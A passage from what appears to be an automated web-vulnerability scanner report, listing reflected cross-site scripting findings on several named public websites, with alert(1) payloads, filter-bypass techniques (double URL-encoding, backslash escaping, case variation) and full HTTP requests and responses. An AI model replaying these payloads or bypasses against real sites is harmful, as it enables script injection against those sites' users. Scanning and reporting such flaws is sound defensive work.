The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22ad7%253cscript%253ealert%25281%2529%253c%252fscript%253eb9863c1a48a was submitted in the REST URL parameter 3. This input was echoed as 22ad7<script>alert(1)</script>b9863c1a48a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/viewBasket.asp22ad7%253cscript%253ealert%25281%2529%253c%252fscript%253eb9863c1a48a HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.3.10.1301681613; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8413
Date: Fri, 01 Apr 2011 18:16:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueviewbasket.asp22ad7<script>alert(1)</script>b9863c1a48a</b>
...[SNIP]...

2.90. http://www.dmvnow.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f92"><script>alert(1)</script>946b1b39319 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88f92"><script>alert(1)</script>946b1b39319 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dmvnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 17:21:10 GMT; path=/
Server: Microsoft-IIS/5.0
Date: Fri, 01 Apr 2011 17:21:10 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 17377
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<HTML>
<HEAD>
<title>Commonwealth of Virginia Department of
...[SNIP]...
<a class="main" href="/webdoc/utilities/error.asp?

404;http://www.dmvnow.com/favicon.ico88f92"><script>alert(1)</script>946b1b39319&

pf=y">
...[SNIP]...

2.91. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11 [qcat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8d20\'%3balert(1)//ff63f7f2300 was submitted in the qcat parameter. This input was echoed as c8d20\\';alert(1)//ff63f7f2300 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile/ws/redir/_iceUrlFlag=11?_IceUrl=true&qcat=webc8d20\'%3balert(1)//ff63f7f2300&qkw= HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

2.92. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the icePage%24SearchBoxTop%24qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96402\'%3balert(1)//a2498f1a00b was submitted in the icePage%24SearchBoxTop%24qcat parameter. This input was echoed as 96402\\';alert(1)//a2498f1a00b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
Content-Length: 1960
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=cbef8ee057aa45668e6fc16a3af0cb01&ActionId=8604994ef54a4503a8ebc16a3af0cb01&CookieDomain=.dogpile.com

__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYFBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY
...[SNIP]...
uw8Cmd%2BzyQ0CuYHVhgQCkKvm%2FwUCxNGrzg8CsqH2uAMChuqLpwMCsKGquAMCsaGC3QoCmfTV2gYCs6SaowUCnI%2BIqgQCt56zoQ8C252OhQUCgKHemAoCmu%2FnvgICkPP5CFy2AeMkGJYIpnubvjN9%2BlFgNo94&icePage%24SearchBoxTop%24qcat=Web96402\'%3balert(1)//a2498f1a00b&icePage%24SearchBoxTop%24rfcid=417&icePage%24SearchBoxTop%24rfcp=&icePage%24SearchBoxTop%24qlnk=0&icePage%24SearchBoxTop%24AdvancedSearchWeb%24advnames=qall%2Cqphrase%2Cqany%2Cqnot%2Clang%2Cqafter%2C
...[SNIP]...

Response (redirected)

2.93. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the icePage%24SearchBoxTop%24qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d72e6\'%3b75d0d1bef7c was submitted in the icePage%24SearchBoxTop%24qcat parameter. This input was echoed as d72e6\\';75d0d1bef7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...
iifX%2BBAKw%2FZDRAQIteqHnA3ZhIp9VQNtHLGXL2pUo&icePage%24SearchBoxTop%24qkw=site%3Axss.cx&icePage%24SearchBoxTop%24qkwsubmit.x=0&icePage%24SearchBoxTop%24qkwsubmit.y=0&icePage%24SearchBoxTop%24qcat=Webd72e6\'%3b75d0d1bef7c&icePage%24SearchBoxTop%24rfcid=417&icePage%24SearchBoxTop%24rfcp=&icePage%24SearchBoxTop%24qlnk=0&icePage%24SearchBoxTop%24AdvancedSearchWeb%24advnames=qall%2Cqphrase%2Cqany%2Cqnot%2Clang%2Cqafter%2C
...[SNIP]...

Response (redirected)

2.94. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [qcat parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc191</ScRiPt%20>b4d651e87b1 was submitted in the qcat parameter. This input was echoed as dc191</ScRiPt >b4d651e87b1 in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true&qcat=dc191</ScRiPt%20>b4d651e87b1 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

2.95. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc14</script><script>alert(1)</script>bc3b9419cd was submitted in the qcat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11?_IceUrl=true&qcat=bdc14</script><script>alert(1)</script>bc3b9419cd HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

2.96. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d46d\'%3b6b7e482d682 was submitted in the qcat parameter. This input was echoed as 1d46d\\';6b7e482d682 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11?qcat=1d46d\'%3b6b7e482d682&qkw=Go%20Daddy%20CEO%20Elephant&qcoll=relevance&zoom=off&bepersistence=true&newtxn=false&qi=21&qk=20&page=2&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

2.97. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c5ea\'%3balert(1)//e445c104ee1 was submitted in the qcat parameter. This input was echoed as 6c5ea\\';alert(1)//e445c104ee1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11?rfcp=TopNavigation&rfcid=407&qcat=Web6c5ea\'%3balert(1)//e445c104ee1&qkw=MLB%20Schedule&newtxn=false&qcoll=Relevance&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

2.98. http://www.kicksonfire.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kicksonfire.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbf7</script><script>alert(1)</script>4eeb72bba5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4dbf7</script><script>alert(1)</script>4eeb72bba5c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kicksonfire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 01 Apr 2011 16:21:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Pingback: http://www.kicksonfire.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.4b
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 16:21:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 21954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"www.kicksonfire.com/favicon.ico4dbf7</script><script>alert(1)</script>4eeb72bba5c",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

2.99. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ny1.com
Path:	/App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb45a'%3b3be91b1fed6 was submitted in the REST URL parameter 1. This input was echoed as cb45a';3be91b1fed6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skinscb45a'%3b3be91b1fed6/news1/favicon.ico HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56055
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:20:57 GMT
Date: Fri, 01 Apr 2011 18:10:57 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/App_Skinscb45a';3be91b1fed6/news1/favicon.ico'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.100. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ny1.com
Path:	/App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9307'%3b60ed35259b0 was submitted in the REST URL parameter 2. This input was echoed as b9307';60ed35259b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skins/news1b9307'%3b60ed35259b0/favicon.ico HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:04 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56061
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:09 GMT
Date: Fri, 01 Apr 2011 18:11:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/App_Skins/news1b9307';60ed35259b0/favicon.ico'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.101. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ny1.com
Path:	/App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90922'%3b84586baa9ee was submitted in the REST URL parameter 3. This input was echoed as 90922';84586baa9ee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /App_Skins/news1/favicon.ico90922'%3b84586baa9ee HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:15 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56154
Vary: Accept-Encoding
Cache-Control: public, max-age=594
Expires: Fri, 01 Apr 2011 18:21:10 GMT
Date: Fri, 01 Apr 2011 18:11:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/App_Skins/news1/favicon.ico90922';84586baa9ee/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.102. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 741cc'%3b7ff253c1040 was submitted in the REST URL parameter 1. This input was echoed as 741cc';7ff253c1040 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content741cc'%3b7ff253c1040/ServeContent.aspx?id=694&ticks=810228 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56103
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:20:35 GMT
Date: Fri, 01 Apr 2011 18:10:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content741cc';7ff253c1040/ServeContent.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.103. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f48c2'%3b6f5ee646a27 was submitted in the REST URL parameter 2. This input was echoed as f48c2';6f5ee646a27 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeContent.aspxf48c2'%3b6f5ee646a27?id=694&ticks=810228 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
